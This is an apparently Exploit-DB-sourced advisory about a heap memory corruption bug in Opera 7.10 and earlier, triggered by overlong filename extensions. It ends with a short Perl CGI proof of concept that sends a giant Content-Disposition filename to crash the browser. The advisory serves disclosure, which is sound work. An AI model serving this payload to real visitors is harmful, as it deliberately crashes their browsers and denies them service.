Opera 7.10 and Earlier Heap Memory Corruption Vulnerability

vendor:

Opera

by:

SecurityFocus

7.5

CVSS

HIGH

Heap Memory Corruption

119

CWE

Product Name: Opera

Affected Version From: 7.1

Affected Version To: 7.1

Patch Exists: Yes

Related CWE: N/A

CPE: opera

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Opera 7.10 and Earlier Heap Memory Corruption Vulnerability

A vulnerability has been reported for Opera versions 7.10 and earlier. The problem is said to occur due to insufficient bounds checking on filename extensions. As a result, it may be possible for an attacker to corrupt heap-based memory. Successful exploitation of this vulnerability may result in a denial of service, possibly prolonged. If a malicious filename entry were placed in a cache file, Opera may continuously crash until the cache file has been deleted.

Mitigation:

Upgrade to the latest version of Opera.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7450/info

A vulnerability has been reported for Opera versions 7.10 and earlier. The problem is said to occur due to insufficient bounds checking on filename extensions. As a result, it may be possible for an attacker to corrupt heap-based memory.

Successful exploitation of this vulnerability may result in a denial of service, possibly prolonged. If a malicious filename entry were placed in a cache file, Opera may continuously crash until the cache file has been deleted.

#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.

$|=1;
my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

print "Content-type: text/html\r\n";
print qq~Content-Disposition: filename="$filename"\r\n~;
print "\r\n";
print "<html><body>Love & Peace :)</body></html>\r\n";